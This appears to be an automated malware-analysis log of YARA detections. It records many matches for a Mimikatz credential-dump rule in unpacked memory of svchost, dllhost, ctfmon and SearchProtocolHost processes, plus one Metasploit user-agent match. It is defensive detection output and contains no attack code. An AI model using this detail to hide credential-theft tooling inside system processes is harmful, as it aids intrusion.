      Source: 2.3.svchost.exe.4f42c68.17.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2897468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8e2c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.46.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.48.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.517468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.43.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.42.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.20.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.7d2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.53.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.45.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.3079000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 29.0.svchost.exe.8d7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.26.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8d7468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.7c7468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.15.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.12.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.787468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.2.dllhost.exe.2897468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8e2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.42.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.23.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.857468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.40.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.51.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.35.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.522c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.8.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.47.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
